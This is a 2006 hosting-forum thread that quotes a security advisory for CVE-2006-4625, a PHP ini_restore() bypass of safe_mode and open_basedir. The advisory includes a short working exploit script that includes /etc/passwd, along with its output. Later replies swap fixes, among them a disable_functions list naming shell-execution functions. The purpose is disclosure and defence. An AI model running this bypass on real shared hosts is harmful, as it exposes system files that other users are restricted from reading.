PHP Safe Mode Bypass

HH-Steve

Verified User
Joined
Oct 8, 2004
Messages
59
Location
Australia
Not really a version update but this was the most relevent section so if this is in the wrong section feel free to move it.

If you rely on php safe mode try the code in the security advisory below and if it shows the contents of your /etc/passwd make sure you set safe mode to On in your php.ini rather than just using the directadmin switch or custom virtual_host.conf:

-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1



[PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()]





Author: Maksymilian Arciemowicz (cXIb8O3)

Date:

- - Written: 05.09.2006

- - Public: 09.09.2006

SecurityAlert Id: 42

CVE: CVE-2006-4625

SecurityRisk: High

Affected Software: PHP 5.1.6 / 4.4.4 < = x

Advisory URL: http://securityreason.com/achievement_securityalert/42

Vendor: http://www.php.net



- --- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific

features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.



A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much

of the PHP Conference Material is freely available.



php_admin_value name value



Sets the value of the specified directive. This can not be used in .htaccess files. Any directive type set with php_admin_value can

not be overridden by .htaccess or virtualhost directives. To clear a previously set value use none as the value.

php_admin_flag name on|off



Used to set a boolean configuration directive. This can not be used in .htaccess files. Any directive type set with php_admin_flag

can not be overridden by .htaccess or virtualhost directives.



http://pl.php.net/manual/en/configuration.changes.php



- --- 1. php_admin_value and php_admin_flag Bypass ---

When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g.

httpd.conf). This options are using by a lot of ISP to set open_basedir, safe_mode and more options.



For example:

open_basedir in httpd.conf



- ---

<Directory /usr/home/frajer/public_html/>

Options FollowSymLinks MultiViews Indexes

AllowOverride None

php_admin_flag safe_mode 1

php_admin_value open_basedir /usr/home/frajer/public_html/

</Directory>

- ---



In PHP are two config options. Are Local Value and Master Value. More in phpinfo() or ini_get()



Example:

If you have safe_mode or open_basedir (etc) set in Local Value for selected users and in Master Value is default value, you can restore

Master Value to Local Value per ini_restore() function!



- ---

ini_restore



(PHP 4, PHP 5)

ini_restore -- Restores the value of a configuration option

- ---



Restores the value of a php.ini file. Then your PHP options from httpd.conf are bypassed.



EXPLOIT:

- ---

<?

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include("/etc/passwd");

ini_restore("safe_mode");

ini_restore("open_basedir");

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include("/etc/passwd");

?>

- ---



RESULT OF EXPLOIT:

- ---

1

/usr/home/frajer/public_html/

Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s):

(/usr/home/frajer/public_html/) in /usr/home/frajer/public_html/ini_restore.php on line 4



Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in

/usr/home/frajer/public_html/ini_restore.php on line 4



Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in

/usr/home/frajer/public_html/ini_restore.php on line 4

# $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-ag.....

- ---



This issue is very dangerous, because Admin can't correct set open_basedir or safe_mode for all users.



- --- 2. How to fix ---

fixed in CVS HEAD, PHP_5_2, PHP_5_1 and PHP_4_4.



http://cvs.php.net/viewcvs.cgi/php-src/NEWS



- --- 3. Greets ---



For: sp3x

and

p_e_a, l5x



- --- 4. Contact ---

Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]

Email: cxib [at] securityreason [dot] com

GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg



Regards

SecurityReason

-----BEGIN PGP SIGNATURE-----

Version: GnuPG v1.4.2.2 (FreeBSD)



iD8DBQFFApZZ3Ke13X/fTO4RAmA4AJ9g4rA0hqST7Px7i03RGpE1bmZmrgCgmt0a

SvP3KPhmLtZcCNFmtGa8oJ8=

=bqQV

-----END PGP SIGNATURE-----
 
Last edited:
hello,
did you try this PHP Version 4.4.5-dev
Code:
cd /usr/local/directadmin/customapache
wget http://snaps.php.net/php4-STABLE-200609101230.tar.gz
tar -zxvf  php4-STABLE-200609101230.tar.gz
mv php4-STABLE-200609101230 php-4.4.5-dev
tar -czvf php-4.4.5-dev.tar.gz php-4.4.5-dev
perl -pi -e 's/4.4.4/4.4.5-dev/' build
./build clean
./build php y
/sbin/service httpd restart


Wael
 
Last edited:
probably not. But I'm little confused as to how this will effect the way we disable Safe Mode from DA. I don't want to enable it in php.ini and then have clients break.
 
sullise said:
probably not. But I'm little confused as to how this will effect the way we disable Safe Mode from DA. I don't want to enable it in php.ini and then have clients break.

You can still disable safe mode in DA for some sites if it is set to On in php.ini but if it is set to Off in php.ini as DA does by default at installation anybody can bypass safe mode.

Steve
 
Well, set Safe Mode = On in php.ini, restarted httpd and still does same thing. Even tried it in a jailed acct.
 
Last edited:
The best way I can think of is to run php as a fast cgi process and have php processes running under each shared user accounts. That way they're restricted by the linux permissions set to them.
 
Hi,

There is no need for installing a hardening path that may create problems for other functions etc, also there no need to try cvs version of php and what not as they could be unstable.

My simple easy fix is to open "/usr/local/lib/php.ini" then search for "disable_functions =" make sure its uncommented and then just change it too "disable_functions = ini_restore". This stops this exploit while maintaining maximum compatibility.

Once you've saved it just restart apache. I've tested it and it works fine.

Regards,
Grant
 
Again, no dice.

While doing so does give you the error:

Warning: ini_restore() has been disabled for security reasons

It still displays the /etc/passwd file
 
Obviously it only works for the people who have openbasedir/safemode set in the httpd.conf files.

You haven't.

Thanks,
Grant
 
i Fix it for freeBSD 5.x


#cd /usr/local/directadmin/customapache
#wget http://snaps.php.net/php4-STABLE-200609101230.tar.gz
#tar -zxvf php4-STABLE-200609101230.tar.gz
#mv php4-STABLE-200609101230 php-4.4.5-dev
#tar -czvf php-4.4.5-dev.tar.gz php-4.4.5-dev
#perl -pi -e 's/4.4.4/4.4.5-dev/' build
#./build clean
#./build all y


#/usr/local/etc/rc.d/httpd restart

#vi /usr/local/lib/php.ini

#disable_functions = ini_restore

and

#chmod 751 /etc/passwd



out put


Warning: main(/etc/passwd) [function.main]: failed to open stream: Permission denied in /var/www/html/er.php on line 4

Warning: main(/etc/passwd) [function.main]: failed to open stream: Permission denied in /var/www/html/er.php on line 4

Warning: main() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/er.php on line 4

Warning: ini_restore() has been disabled for security reasons in /var/www/html/er.php on line 5

Warning: ini_restore() has been disabled for security reasons in /var/www/html/er.php on line 6

Warning: main(/etc/passwd) [function.main]: failed to open stream: Permission denied in /var/www/html/er.php on line 9

Warning: main(/etc/passwd) [function.main]: failed to open stream: Permission denied in /var/www/html/er.php on line 9

Warning: main() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/er.php on line 9
 
Last edited:
not change open_basedir default config
 
Last edited:
last php php4-STABLE-200609111430
Code:
cd /usr/local/directadmin/customapache
rm -fr build
wget http://files.directadmin.com/services/customapache/build
chmod 755 build
./build update
wget http://snaps.php.net/php4-STABLE-200609111430.tar.gz
tar -zxvf  php4-STABLE-200609111430.tar.gz
mv php4-STABLE-200609111430 php-4.4.5.dev
tar -czvf php-4.4.5.dev.tar.gz php-4.4.5.dev
perl -pi -e 's/4.4.4/4.4.5.dev/' build
./build clean
./build php y
/sbin/service httpd restart
and use some :)
Code:
disable_functions = ini_restore, sscanf, tempnam, copy,  popen , pclose, system, exec, shell_exec, suExec, dl, passthru, pclose, proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, pfsockopen, leak, apache_child_terminate, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, escapeshellcmd, escapeshellarg
etc.


if you want use (hardening)
Code:
cd /usr/local/directadmin/customapache
./build clean
wget http://www.hardened-php.net/hardening-patch-4.4.4-0.4.15.patch.gz
tar -zxvf  php-4.4.4.tar.gz
bunzip hardening-patch-4.4.4-0.4.15.patch.gz
cd php-4.4.4
patch -p 1 -i ../hardening-patch-4.4.4-0.4.15.patch
cd ..
mv php-4.4.4.tar.gz php-4.4.4.tar.gz.old
tar -czvf php-4.4.4.tar.gz php-4.4.4
./build php y
/sbin/service httpd restart
hardening didn't work fine with zend
:eek:


Wael
 
Last edited:
Code:
1
Warning: main() [function.main]: SAFE MODE Restriction in effect. The script whose uid is 500 is not allowed to access /etc/passwd owned by uid * in /home/user/domains/domain.tld/public_html/test.php on line 4

Warning: main(/etc/passwd) [function.main]: failed to open stream: No such file or directory in /home/user/domains/domain.tld/public_html/test.php on line 4

Warning: main() [function.main]: SAFE MODE Restriction in effect. The script whose uid is 500 is not allowed to access /etc/passwd owned by uid * in /home/user/domains/domain.tld/public_html/test.php on line 4

Warning: main(/etc/passwd) [function.main]: failed to open stream: No such file or directory in /home/user/domains/domain.tld/public_html/test.php on line 4

Warning: main() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:/usr/local/lib/php') in /home/user/domains/domain.tld/public_html/test.php on line 4

Warning: ini_restore() has been disabled for security reasons in /home/user/domains/domain.tld/public_html/test.php on line 5

Warning: ini_restore() has been disabled for security reasons in /home/user/domains/domain.tld/public_html/test.php on line 6
1
Warning: main() [function.main]: SAFE MODE Restriction in effect. The script whose uid is 500 is not allowed to access /etc/passwd owned by uid * in /home/user/domains/domain.tld/public_html/test.php on line 9

Warning: main(/etc/passwd) [function.main]: failed to open stream: No such file or directory in /home/user/domains/domain.tld/public_html/test.php on line 9

Warning: main() [function.main]: SAFE MODE Restriction in effect. The script whose uid is 500 is not allowed to access /etc/passwd owned by uid * in /home/user/domains/domain.tld/public_html/test.php on line 9

Warning: main(/etc/passwd) [function.main]: failed to open stream: No such file or directory in /home/user/domains/domain.tld/public_html/test.php on line 9

Warning: main() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:/usr/local/lib/php') in /home/user/domains/domain.tld/public_html/test.php on line 9
 
@how@ said:
if you want use (hardening)
Code:
cd /usr/local/directadmin/customapache
./build clean
wget [url]http://www.hardened-php.net/hardening-patch-4.4.4-0.4.15.patch.gz[/url]
tar -zxvf  php-4.4.4.tar.gz
[b]g[/b]unzip hardening-patch-4.4.4-0.4.15.patch.gz
cd php-4.4.4
patch -p 1 -i ../hardening-patch-4.4.4-0.4.15.patch
cd ..
mv php-4.4.4.tar.gz php-4.4.4.tar.gz.old
tar -czvf php-4.4.4.tar.gz php-4.4.4
./build php y
/sbin/service httpd restart
hardening didn't work fine with zend
:eek:


Wael [/B]

Great solution, Wael !

I used gunzip instead of bunzip though ;)
 
Still totally confused. Did the patch @how@ showed, still doesn't prevent it. What step am I missing?

Not to mention, safe_mode = On in php.ini broke my CP skin....sigh.
 
Last edited:
sullise said:
Still totally confused. Did the patch @how@ showed, still doesn't prevent it. What step am I missing?

Not to mention, safe_mode = On in php.ini broke my CP skin....sigh.

open_basedir?
 
Back
Top